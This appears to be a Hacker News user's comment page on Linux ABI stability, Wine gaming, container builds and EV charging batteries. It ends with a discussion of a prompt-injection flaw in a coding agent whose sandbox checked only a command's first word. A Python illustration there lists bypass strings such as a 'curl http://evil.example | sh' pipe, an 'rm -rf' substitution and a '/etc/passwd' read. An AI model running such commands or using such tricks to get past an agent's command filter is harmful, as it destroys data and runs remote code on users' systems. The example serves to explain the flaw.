orbital-decay's comments | Hacker News

Somehow I'm not surprised that Zero's software is terrible. I don't think being new has anything to do with it, they are just that type of company.

AI unreliability aside, Microsoft suing the hell out of them was always a concern. They do clean room reimplementation to insulate themselves from legal risks as much as possible, another incentive is not what anyone wants.

Well, about clean room: you almost got a haircut thanks to Google v. Oracle in the Android-Java API dispute.

Unlikely. Games need a stable ABI and Win32 is the only stable ABI on Linux.

Proprietary software needs a stable ABI. Not games.

DOOM has run on any Linux system since forever because we've had access to the source. You can build it for Linux 2.6 and it'll probably still work today.

Sadly most games are proprietary


Even if all games were FOSS, without - at least - a stable API, most games would remain a hassle to run. DOOM doesn't suffer from this as much thanks to its large number of volunteers, but relying on community support for all games is just outsourcing labor to some unlucky fellows. At best, it's yet another pain for Linux users. At worst, it's the death of unpopular games. In either case, a hurdle for Linux adoption.

Not really. I actually tried building an "old" game (read: not updated since 2014 or so) on Linux back when I used it. It didn't work: autotools had changed, make threw some weird errors, and the library APIs had changed too.

In the end I gave up and just used Proton on the Windows .exe. Unbelievable. :(


I should clarify: my original comment about stability only applies to glibc itself. Once we go outside glibc there will be varying degrees of API/ABI stability, simply because at that point it's just different groups of people doing the work.

In some cases such libraries are also cross-platform, so the same issues would show up on Windows (e.g. try to build an application that depends on openssl3 against openssl4 and it will not work on either Linux or Windows).

For future reference, if you ever need to do that again, it would be way easier to spin up a container with the build environment the software expects. Track down the last release date of the software, do podman run --rm -it ubuntu:$from_that_time, and just build the software as usual.
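A sketch of that workflow, spelled out (the image tag and package list are assumptions; pick whatever matches the game's last release):

```shell
# Recreate a period-correct build environment. ubuntu:14.04 is an assumed
# example: pick the distro release closest to the game's last update.
IMG=ubuntu:14.04

# The one-liner from above, with the source tree mounted in (shown here
# rather than executed, since pulling the image takes a while):
BUILD="podman run --rm -it -v \$PWD:/src -w /src $IMG"
echo "$BUILD"

# Then, inside the container, build as usual with that era's toolchain:
#   apt-get update
#   apt-get install -y build-essential autoconf automake libtool
#   ./configure && make -j"$(nproc)"
```

The point is that autotools, make, and the library headers inside the image are all the versions the game was last built against, so none of the API drift matters.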

You can typically link the dependencies statically during build time to create system independent binaries. So the binary produced inside the container would work on your host as well.


That sounds almost as easy as just copying an .exe file from Windows and running it.

/s


> Proprietary software needs a stable ABI.

Open source software also needs a stable ABI because:

a) I don't want to bother building it over and over (not everything is in my distro's repository, a ton of software has a stupid build process, and not every new version is better than the old one)

b) a stable ABI implies a stable API, and even if you have the source, it is a massive PITA to fix whatever the program's dependencies broke just to get it running, especially if you're not the developer who wrote it in the first place

c) as an extension of "b", a stable API also means more widely spread information/knowledge about it (people won't have to waste time learning how to do the same tasks in a slightly different way using a different API), which makes it much easier for people to contribute to software that uses that API


People who keep parroting this clearly have no experience of gaming on Linux.

I am playing both modern and old games on Linux. Games outside a super narrow enthusiast realm are always closed-source (even indie ones) and it's going to stay like that in the foreseeable future, that's just a fact of life and gamedev incentives and specifics.

Please elaborate.

Wine has constant regressions. What works fine today will completely fail next year, which is why Steam lets you pick which Proton version you want to use.

Which means that an .exe won't run without the exact right version of Wine.

Plus of course there's the whole Vulkan stuff. Older cards aren't well supported, and it will crash rather than just fall back to OpenGL, where it would work fine.


Those issues seem orthogonal to the stable-ABI issue from the OP, especially the OpenGL one (that is more of a hardware incompatibility issue). When apps fail to run due to Wine updates, those failures are considered bugs to be fixed. On the native side, apps may break because: 1) a required library is unavailable, normally because it is too old and unsupported; 2) a required library's path differs between distro A and distro B. Neither of these is considered a bug and, as such, they are rarely addressed. I believe the Steam Linux Runtime is an attempt to fix this, but I'm not sure about its effectiveness. Also, you are exaggerating with the "exact Wine version": it helps to know which versions don't have a regression by knowing which specific version an app used to run on.

> I believe the Steam Linux Runtime is an attempt to fix this, but I'm not sure about its effectiveness.

It's effective enough for it to be practically a solved problem now.


In practice, Wine is constantly improving. It's in active development and not that stable, but regressions are mostly local. Treat its releases like bleeding edge.

>What works fine today will completely fail next year.

Usually not on the timescale of a year. I have many new games that worked a year ago, and none of them has stopped working since. The worst breakage I had recently was some physics glitches in an old RPG (released in 2001) on Wine 11.0, and it was fixed in the next release.


Are you able to run any of the old Loki games on Linux these days?

With compat libraries and OSSPD it will run even under PulseAudio.

There's nothing recent about the most popular media being manipulated and/or biased. Discussions on this forum date back two decades; the specific narrative just depends on the context.

Same as always I guess? Good cop, bad cop. They seem to go through this cycle every decade or so.

Are they trying to reinvent Cyc?

https://en.wikipedia.org/wiki/Cyc


Yes. That's why I'm using NixOS as well, despite all the terrible jank it has.

Automating my homelab config with coding agents not only hides the jank, it also makes NixOS feel like the actual agentic OS Microsoft wants, or rather an ad-hoc prototype of one. I literally just tell it what to do and describe issues when I have any. But then, I have written a ton of Nix previously and I'm able to verify what it does; most of the time it's correct, but it's not perfect.


>Just taking an existing fast charger with 150- or 350-kW capacity and swapping in the latest and greatest 1,500-kW chargers wouldn’t get anyone faster speeds. The system would need all new “pipes”—grid capacity—to actually move that much current.

The grid doesn't necessarily mean "pipes" or power lines. You don't build a pipeline to every gas station. Mobile charging robots work pretty well in China.


Also, I guess they could put a large battery at the charging station, so it can take, say, a steady 200 kW from the grid and still be able to kick out 1,500 kW for ten minutes occasionally. It could also charge from cheap off-peak electricity.
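Back-of-the-envelope numbers for that setup (all figures are the ones assumed above, not specs of any real station):

```python
# Battery buffer sizing for a 1,500 kW dispenser fed by a 200 kW grid tie.
grid_kw = 200        # steady draw from the grid
peak_kw = 1500       # burst delivered to the car
burst_minutes = 10   # length of one fast-charge session

# Energy delivered in one burst.
burst_kwh = peak_kw * burst_minutes / 60                  # 250 kWh

# The grid covers part of that in real time; the battery supplies the rest.
battery_kwh = (peak_kw - grid_kw) * burst_minutes / 60    # ~217 kWh

# Time to refill the battery from the grid between sessions.
refill_minutes = battery_kwh / grid_kw * 60               # ~65 minutes

print(burst_kwh, round(battery_kwh, 1), round(refill_minutes))
```

So a battery in the low hundreds of kWh covers one burst, and the steady 200 kW tie refills it in about an hour between megawatt sessions.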

> guess they could put a large battery at the charging station

BYD's megawatt charging does exactly that.

The best part: the "large battery" uses the same batteries as BYD's cars. The same electric components, cooling system, etc.


Exactly what Tesla's megapack superchargers do

This is what everyone is already doing, even for relatively small and slow dispensers.

It's simply cheaper to have on-site batteries. It lets an installation work with a smaller connection to the grid, and makes it possible to install chargers in more places without grid upgrades.

Energy arbitrage is profitable on its own, so EV charging stations are almost just an excuse to get some land and a grid connection for more batteries.
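A toy version of that arbitrage math (every figure below is invented for illustration):

```python
# One daily charge/discharge cycle of an on-site battery, filled off-peak
# and dispensed (or sold back) at peak rates. All numbers are made up.
capacity_kwh = 500      # on-site battery size
off_peak_price = 0.06   # $/kWh overnight buy price
peak_price = 0.25       # $/kWh value when dispensed at peak
round_trip_eff = 0.90   # charge/discharge losses

cost = capacity_kwh * off_peak_price           # $30 to fill overnight
delivered_kwh = capacity_kwh * round_trip_eff  # 450 kWh out after losses
revenue = delivered_kwh * peak_price           # $112.50 at peak rates
margin = revenue - cost                        # $82.50 per cycle

print(round(margin, 2))
```

Even after round-trip losses, the spread between off-peak and peak rates leaves a positive margin per cycle, which is the "profitable on its own" part.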


Grid congestion costs for electricity are going to get wild if we start scattering all sorts of random >= 1.5 MW demands everywhere.

Imagine if we had a parallel information network that could coordinate the charging times of all these things in real-time.

Fair bit of overhead to pull that off, but interesting.

Not really, all you'd need to do is publish a live price ticker that depends on congestion, make it available over the network, and economics takes care of the rest.
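A toy sketch of that mechanism (the price curve and all constants are made up): each charger polls a congestion-dependent price and simply declines to draw power when it's above what it's willing to pay.

```python
# Congestion-dependent spot price plus a price-sensitive charger.
# The curve and every constant here are invented for illustration.

def spot_price(load_mw: float, capacity_mw: float,
               base: float = 0.10, steepness: float = 4.0) -> float:
    """$/kWh that rises sharply as load approaches capacity."""
    utilization = min(load_mw / capacity_mw, 0.999)
    return base * (1 + steepness * utilization ** 3)

def will_charge(price: float, max_price: float) -> bool:
    """A charger draws power only while the price is acceptable."""
    return price <= max_price

# Off-peak: plenty of headroom, price near base, chargers run.
off_peak = spot_price(load_mw=20, capacity_mw=100)
# Near capacity: price spikes, price-sensitive chargers defer.
peak = spot_price(load_mw=95, capacity_mw=100)

print(round(off_peak, 3), round(peak, 3))
print(will_charge(off_peak, 0.20), will_charge(peak, 0.20))
```

Deferring the flexible >= 1.5 MW loads to cheap hours is exactly the coordination the joke above is about; the "parallel information network" is just a price feed.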

This is what they are already doing. The article is behind a paywall, so no clue if they say it there, but see for example this article about it: https://www.etechvolution.com/p/byd-megawatt-flash-charging-...

Supercaps are viable for this sort of short-term charge and discharge. The much-maligned Donut Labs battery is suspected to be a license-built Nordic hybrid supercap model.


They removed VPNs at the request of the Russian government too (they have no operations in Russia). They are actively participating in government censorship.

>Snowflake Cortex AI Escapes Sandbox and Executes Malware

*rolls eyes* Actual content: a prompt-injection vulnerability discovered in a coding agent


Well, there's the prompt injection itself, and then there's the fact that the agent framework tried to defend against it with a "sandbox" that technically existed but was ludicrously inadequate.

I don't know how anyone with a modicum of Unix experience would think that examining only the first word of a shell command is enough to tell you whether it can lead to arbitrary code execution.
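To make the point concrete, here's a hypothetical first-word allowlist of the kind described (a reconstruction for illustration, not Snowflake's actual code) and a few ordinary shell idioms that walk right past it:

```python
# A naive "sandbox" that approves a shell command if its first word is on
# an allowlist, plus shell idioms that defeat it. Illustrative, not real.
ALLOWED = {"ls", "cat", "echo", "grep"}

def naive_check(command: str) -> bool:
    """Approve the command if its first whitespace-separated word is allowed."""
    first_word = command.strip().split()[0]
    return first_word in ALLOWED

# Each of these starts with an allowed word, so the check approves them,
# yet every one can execute arbitrary code:
bypasses = [
    "echo $(rm -rf ~/important)",                  # command substitution
    "cat /etc/passwd; ./malware",                  # command separator
    "ls && curl http://evil.example | sh",         # conditional chaining
    "grep x /dev/null || python3 -c 'import os'",  # fallback chaining
]
for cmd in bypasses:
    assert naive_check(cmd)   # the "sandbox" approves every one

# Only commands that don't lead with an allowed word get blocked:
assert not naive_check("curl http://evil.example | sh")
```

Anything short of actually parsing the shell grammar (separators, substitutions, pipes, redirections) reduces to this, which is why a first-word check is not a sandbox.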

